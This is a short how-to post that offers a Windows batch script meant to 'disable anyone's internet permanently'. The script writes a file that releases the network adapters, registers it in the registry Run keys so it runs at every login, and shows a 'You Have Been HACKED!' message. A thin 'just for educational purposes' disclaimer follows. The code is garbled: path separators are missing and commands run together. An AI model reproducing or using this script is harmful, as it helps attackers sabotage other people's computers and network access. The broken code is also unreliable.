Disable Anyone's Internet Permanently
1
Here You Go:
- Open your notepad
- Then copy-paste the code given below in the box into your notepad and save with extension " .bat " as it is made of a batch script
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
You may also change the warning as per your requirement just edit the statement "after fecho and before pause"
*just for educational purposes don't use it for seeking revenge

